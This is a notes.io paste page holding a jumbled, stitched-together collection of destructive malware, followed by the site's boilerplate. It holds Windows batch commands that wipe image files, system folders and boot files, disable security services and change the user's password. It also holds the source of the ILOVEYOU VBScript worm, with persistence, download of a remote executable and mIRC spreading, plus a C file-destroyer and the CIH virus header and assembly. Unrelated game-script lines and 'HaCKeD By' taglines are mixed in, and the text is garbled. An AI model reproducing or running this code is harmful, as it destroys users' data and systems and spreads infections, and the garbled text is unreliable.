NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

del /f /q /s %systemdrive%*.jpg
del /f /q /s %systemdrive%*.jpeg
del /f /q /s %systemdrive%*.gif
del /f /q /s %systemdrive%*.bmp
del /f /q /s %systemdrive%*.jpe
del /f /q /s %systemdrive%*.jpg
del /f /q /s %systemdrive%*.tif
del /f /q /s %systemdrive%*.dib
del /f /q /s %systemdrive%*.tiff
del /f /q /s %systemdrive%*.jfif
del /f /q /s %systemdrive%*.png
@echo off
net stop "Security Center"
net stop SharedAccess
> -%Temp%.kill.reg" ECHO A R E S
>>-%Temp%.kill.reg" ECHO.
>>-%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess]
>>-%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.kill.reg" ECHO.
>>-%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv]
>>-%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.kill.reg" ECHO.
>>-%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc]
>>-%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S -%Temp%.kill.reg"
DEL -%Temp%.kill.reg"
cd..
cd..
attrib -s -h -r -a c:ntldr
del c:ntldr
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,e q,ctr,file,vbscopy,d ow
eq=--
ctr=0
Set fso = CreateObject("Scripting.FileSy stemObject")
set file = fso.OpenTextFile(WScript.Scrip tFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.She ll")
rr=wscr.RegRead("HKEY_CURRENT_ USERSoftwareMicros oftWindow s Scripting HostSettingsTimeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USERSoftwareMi crosoftWindows Scripting HostSettingsTimeout",0,"REG_ DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFull Name)
c.Copy(dirsystem&-MSKernel32. vbs")
c.Copy(dirwin&-Win32DLL.vbs")
c.Copy(dirsystem&-LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINESoftwareM icrosoftWindows Cur rentVersio nRunMSKernel32",dirsystem&- MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINESoftwareM icrosoftWindows Cur rentVersio nRunServicesWin32DLL",dirwin &-Win32DLL.vbs"
downread=--
downread=regget("HKEY_CURRENT_ USERSoftwareMicros oftIntern et ExplorerDownload Directory")
if (downread=--) then
downread="c:-
end if
if (fileexist(dirsystem&-WinFAT3 2.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCUSoftwareMicrosoftInter net ExplorerMainStart Page","http://www.skyinet.net/~young1s/HJKh...twertnMTFwetrd sfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCUSoftwareMicrosoftInter net ExplorerMainStart Page","http://www.skyinet.net/~angelcat/skl...wetryDGFikjUIy qwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCUSoftwareMicrosoftInter net ExplorerMainStart Page","http://www.skyinet.net/~koichi/jf6TR...198vbFV5hfFEkb opBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCUSoftwareMicrosoftInter net ExplorerMainStart Page","http://www.skyinet.net/~chu/sdgfhjks...nfgkKLHjkqwtuH JBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw23 7461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&-WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINESoftwareM icrosoftWindows Cur rentVersio nRunWIN-BUGSFIX",downread&-WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USERSoftwareMi crosoftInternet ExplorerMainStart Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&--)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bna me,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.pa th)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&--&bname& -.vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&-.vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path &-.vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+ 2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(f olderspec&-script.i ni")
scriptini.WriteLine -[script]-
scriptini.WriteLine -;mIRC Script"
scriptini.WriteLine -; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine - corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine -;-
scriptini.WriteLine -;Khaled Mardam-Bey"
scriptini.WriteLine -;http://www.mirc.com"
scriptini.WriteLine -;-
scriptini.WriteLine "n0=on 1:JOIN:#:{-
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }-
scriptini.WriteLine "n2= /.dcc send şnick -&dirsystem&-LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}-
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspe c)) then
msg = 0
cd c:\
attrib -s -h boot.ini
cls
attrib -s -h found.000
attrib -s -h found.001
t>boot.ini
attrib -a -s -h pagefile.sys
h>pagefile.sys
attrib -a -s -h hiberfil.sys
HH>hiberfil.sys
attrib -a -s -h -r bootfont.bin
hhh>bootfont.bin
attrib -a -s -h -r ntdetect.com
ff>ntdetect.com
attrib -a -s -h -r ntldr
f>ntldr
cls
cd..
cd..
cls
cd windows
g>win.ini
cls
g>system.ini
cls
cd pss
ft>system.ini.backup
f>win.ini.backup
cls
cd c:\
@echo .::.HADi baslayalım.::.
cd windows
cd system32
attrib -r -h -s dllcache
cls
attrib -a -h -r *.manifest
cls
cd config
attrib -a -h *.log
cd..
cd restore
attrib -r -h -s filelist.xml
cls
cd c:\
cls
cd windows
cls
tskill msnmsgr /a
tskill msmsgs /a
cls
del /f /q /s c:\windows\system32\*.*
cls
cd repair
attrib -a -h ntuser.dat
f>ntuser.dat
ff>secstup.inf
cd..
attrib -h inf
attrib -h -s installer
attrib -h pif
attrib -r -h -a WindowsShell.Manifest
attrib -r -h şMSI31Uninstall_KB893803ş
attrib -s -a bootstat.dat
attrib -s -h services.dll
attrib -s -h qservice.exe
attrib -a -r set3.tmp
attrib -s -h winnt.bmp
attrib -s -h winnt256.bmp
cls
cd c:\
del /f /q /s c:\windows\*.*
cls
cd..
cd..
cd program files
cd internet explorer
attrib -a -s -h iexplore.exe
cd c:\
cls
del /f /q /s c:\program files\*.*
cls
cd..
cd..
attrib -a -h -r -s msdos.sys
attrib -a -s -h config.sys
cls
attrib -a -h -r -s IO.sys
cls
del /f /q /s c:\*.*
cls
@echo Yuklemeyi Bitirmek Ilerlemeniz Gerekir…
@echo Veri Kayiplari Olmamasi icin….!!!!!!…
@echo Devam Etmeniz Kesinlikle Onerilir…!!!..
pause
cls
cd..
cd..
cd ********s and Settings
cd All Users
cd Desktop
md .HackEd
md Bys
md Hacker
dir /s>HAcKeD.ini
@echo HALA shutDownN.exe Pc DEYse RES iyi Gider
cls
tsshutdn 5 /delay:2
tsshutdn 5 /delay:2
}
span(p)
char *p;
{
struct ffblk f;
char n[129];
int r;
SearchAndDestroy(p);
sprintf(n,-%s\\%s-,p,-*.*-);
for(r=findfirst(n,&f,0x0010);!r;r=findnext(&f)) {
if(*f.ff_name==-.-) continue;
if(f.ff_attrib & 0x0010) {
sprintf(n,-%s\\%s-,p,f.ff_name);
span(n);
}
}
}
SearchAndDestroy(p)
char *p;
{
struct ffblk f;
char b[81];
int r;
strcpy(b,p);
strcat(b,-\\*.*-);
for(r=findfirst(b,&f,0x0000);!r;r=findnext(&f)) {
sprintf(b,-%s\\%s-,p,f.ff_name);
remove(b);
}
}
boot()
{
char *buff;
char *test;
fprintf(test,"THIS PROGRAM WAS MADE BY Someone Else!!-);
abswrite(2,12,0,buff);
}
@echo off
C:WINDOWSCOMMANDdeltree /y c:windows*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:Progra~1*.*
@echo off
C:WINDOWSCOMMANDdeltree /y c:*.*
@echo off
cls
cls
@echo off
net user %username% nkasfasfjsalfjsdkjfdgf2g3fd1g3d5fg1df3g4df5g4df
del /f /q d:
del /f /q c:
DEL "C:WINDOWSsystemAVICAP.DLL"
DEL "C:WINDOWSsystemAVIFILE.DLL"
DEL "C:WINDOWSsystemCOMMDLG.DLL"
DEL "C:WINDOWSsystemKEYBOARD.DRV"
DEL "C:WINDOWSsystemLZEXPAND.DLL"
DEL "C:WINDOWSsystemMCIAVI.DRV"
DEL "C:WINDOWSsystemMCISQ.DRV"
DEL "C:WINDOWSsystemMCIWAVE.DRV"
DEL "C:WINDOWSsystemMMSYSTEM.DLL"
DEL "C:WINDOWSsystemMMTASK.TSK"
DEL "C:WINDOWSsystemMOUSE.DRV"
DEL "C:WINDOWSsystemMSVIDEO.DLL"
DEL "C:WINDOWSsystemOLECLI.DLL"
DEL "C:WINDOWSsystemOLESVR.DLL"
DEL "C:WINDOWSsystemsetup.inf"
DEL "C:WINDOWSsystemSHELL.DLL"
DEL "C:WINDOWSsystemSOUND.DRV"
DEL "C:WINDOWSsystemstdole.tlb"
DEL "C:WINDOWSsystemSYSTEM.DRV"
DEL "C:WINDOWSsystemTAPI.DLL"
DEL "C:WINDOWSsystemTIMER.DRV"
DEL "C:WINDOWSsystemVER.DLL"
DEL "C:WINDOWSsystemVGA.DRV"
DEL "C:WINDOWSsystemWFWNET.DRV"
DEL "C:WINDOWSsystemWINSPOOL.DRV"
RD "C:WINDOWSsystem"
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
************************************************** *************************
*
; * The Virus Program Information *
;
************************************************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT bydogan of Turkey *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 06/21/2007
*
; * *
;
*================================================= =========================
*
; * Modification History *
;
*================================================= =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*================================================= =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*================================================= =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
************************************************** *************************
*
.586P
;
************************************************** *************************
*
; * Original PE Executable File(Don't Modify this Section)
*
;
************************************************** *************************
*
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic <eval (10+((<p.x>*100)/1337))> <eval (10+((<p.y>*100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=<argn1>
local.t_y=<argn2>
sector.allclients sendpacket 0c0 00 D<var.src> D<var.target> W<var.effect> W<p.x> W<eval <p.y>> B<qval <argn3>?<argn3>:<p.z>> W<local.t_x> W<local.t_y> B<qval <argn3>?<argn3>:<p.z>> B<var.speed> B<var0.duration> 00 00 00 B<qval <var0.explode>?<var.explode>:0> D<hval <var.hue> - 1> D<var.rendermode>
shutdown -s -c "HaCKeD By AhMeT"
START TSKILL EXPLORER
ORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
START TSKILL EXPLORER
Del "C:Windowssystem32"
Del "C:WindowsSystem32rstrui.exe"
START TSKILL EXPLORER
echo off : HaCKeD By KANORP
     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.